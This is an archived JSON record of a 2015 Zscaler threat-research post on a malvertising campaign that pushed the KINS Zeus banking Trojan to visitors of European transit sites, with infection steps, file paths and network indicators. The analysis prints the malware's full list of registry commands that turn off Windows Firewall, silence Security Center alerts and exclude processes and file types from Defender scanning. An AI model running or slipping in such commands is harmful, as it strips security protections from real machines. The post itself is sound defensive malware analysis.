{
	"id": "305a27a7-a80a-412b-8a52-92af61ba8e45",
	"created_at": "2026-04-06T00:12:39.375664Z",
	"updated_at": "2026-04-10T03:21:07.088612Z",
	"deleted_at": null,
	"sha1_hash": "488282fe88133328ea9ee139de9f3488205d4c86",
	"title": "Malvertising Targeting European Transit Users | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1118188,
	"plain_text": "Malvertising Targeting European Transit Users | Zscaler\r\nBy Chris Mannon\r\nPublished: 2015-03-11 · Archived: 2026-04-05 16:45:03 UTC\r\nMalvertising has been an active and growing attack vector for delivering malicious payloads to unsuspecting users. ThreatLabZ recently uncovered a malvertising campaign targeting European transit users; the end payload appears to be downloading the KINS Zeus variant.\r\nThe KINS (Kasper Internet Non-Security) variant of Zeus is a banking Trojan that has been prevalent since 2011. KINS is a crimekit that was developed from the leaked ZeuS source code to replace the aged Citadel Trojan, which was used to harvest credentials from victim PCs.\r\nThreatLabZ has seen many instances of this threat being downloaded in the wild with very low AV detection. The malicious dropper payload is downloaded from URLs that match the following pattern:\r\n[domain]:[nonstandard port]/[var1].php?[var2]=n\u0026[var3]=n\u0026[var4]=n\u0026[var5]=n\u0026[var6]=n\u0026[var7]=n\u0026[var8]=n\r\nn = random 1-4 digit number\r\nSome examples of this activity are seen below:\r\nThis variant of the KINS crimekit is spreading through malvertising attempts targeting European users. All the download attempts seen above have two things in common:\r\n1. Victims were visiting a site related to European transit\r\n2. 
Victims were redirected to the final destination through an advertising network\r\n[Figure: Sample infection cycle URLs]\r\nThe malware masquerades as a PDF document to lure an unsuspecting user into opening the file. Upon execution, it creates a copy of itself in the %Application Data% directory, deletes the original copy of itself and injects into the system explorer.exe process to perform a variety of actions. The dropped file on the infected system can be found at one of the following two locations:\r\n%Application Data%\\svchoste.exe [Windows XP]\r\n%Application Data%\\Roaming\\[random 4-5 character string]\\[random 4-5 character string].exe [Windows 7]\r\nThe bot further makes multiple system registry modifications to evade detection:\r\nMicrosoft security center - disable update notifications, disable antimalware scan:\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v UpdatesDisableNotify /t reg_dword /d 1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v FirewallOverride /t reg_dword /d 1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v FirewallDisableNotify /t reg_dword /d 1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v AntiVirusOverride /t reg_dword /d 1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Security Center /v AntiVirusDisableNotify /t reg_dword /d 1 /f\r\nWindows firewall settings - Allow exceptions, disable notifications, disable the firewall:\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\DomainProfile /v DisableNotifications /t reg_dword /d 1 /f\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\DomainProfile /v DoNotAllowExceptions /t reg_dword /d 0 /f\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\DomainProfile /v 
EnableFirewall /t reg_dword /d 0 /f\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\publicprofile /v DisableNotifications /t reg_dword /d 1 /f\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\standardprofile /v DisableNotifications /t reg_dword /d 1 /f\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\publicprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\standardprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\publicprofile /v EnableFirewall /t reg_dword /d 0 /f\r\nreg add HKLM\\system\\currentcontrolset\\Services\\SharedAccess\\parameters\\firewallpolicy\\standardprofile /v EnableFirewall /t reg_dword /d 0 /f\r\nWindows Defender \u0026 AntiMalware settings - Exclude malware processes, injected system processes and certain file types from scanning:\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\" /v svchost.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\" /v consent.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\" /v rundll32.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\" /v spoolsv.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\" /v explorer.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\" /v rgjdu.exe /t REG_DWORD /d 0\r\nreg add 
\"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\" /v afwqs.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\" /v *.tmp /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\" /v *.dll /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\" /v *.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes\" /v svchost.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes\" /v consent.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes\" /v rundll32.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes\" /v spoolsv.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes\" /v explorer.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes\" /v rgjdu.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Processes\" /v afwqs.exe /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Extensions\" /v *.tmp /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Extensions\" /v *.dll /t REG_DWORD /d 0\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Extensions\" /v *.exe /t REG_DWORD /d 0\r\nThe injected code in the system explorer process is responsible for performing Command \u0026 Control (C\u0026C) communication. 
It also opens up a port (TCP 36139) on the victim machine listening for incoming connections.\r\n[Figure: Listening on TCP port 36139]\r\nThere are two common network level indicators to identify a compromised node:\r\n1. A POST transaction with the following hard-coded User-Agent string:\r\nMozilla/5.0 (Windows; Windows NT 7.1; en; rv:1.9.6.8) Gecko/20120122 Firefox/9.1.2\r\n2. A POST request made to a URI like '/common/link.php'.\r\n[Figure: POST encrypted information to C\u0026C server]\r\nThe bot encrypts the system information in the following format and sends it via the above POST request to the C\u0026C server:\r\nv=%d\u0026s=%d\u0026h=%d\u0026un=%s\u0026o=%d\u0026c=%d\u0026ip=%s\u0026sys=%s\u0026uid=%d\u0026w=%d\u0026ftp=\r\nThe screenshot below shows the decrypted C\u0026C location as well as a remote configuration file location for the bot:\r\n[Figure: Decrypted C\u0026C locations]\r\nBelow is the C\u0026C call back activity for the months of January and February 2015 and the geo-location of the C\u0026C servers:\r\n[Figure: C\u0026C server location]\r\nMalvertising remains an effective exploit vector for threat actors to compromise victim systems. 
The variation in payloads distributed through this tactic ranges from click-fraud botnet activity to highly effective crimeware, giving complete control of the infected systems to the remote attackers.\r\nDisclaimer: This blog post has been created by Zscaler for informational purposes only and is provided \"as is\" without any guarantees of accuracy, completeness or reliability. Zscaler assumes no responsibility for any errors or omissions or for any actions taken based on the information provided. Any third-party websites or resources linked in this blog post are provided for convenience only, and Zscaler is not responsible for their content or practices. All content is subject to change without notice. By accessing this blog, you agree to these terms and acknowledge your sole responsibility to verify and use the information as appropriate for your needs.\r\nSource: https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users"
	],
	"report_names": [
		"malvertising-targeting-european-transit-users"
	],
	"threat_actors": [],
	"ts_created_at": 1775434359,
	"ts_updated_at": 1775791267,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/488282fe88133328ea9ee139de9f3488205d4c86.pdf",
		"text": "https://archive.orkl.eu/488282fe88133328ea9ee139de9f3488205d4c86.txt",
		"img": "https://archive.orkl.eu/488282fe88133328ea9ee139de9f3488205d4c86.jpg"
	}
}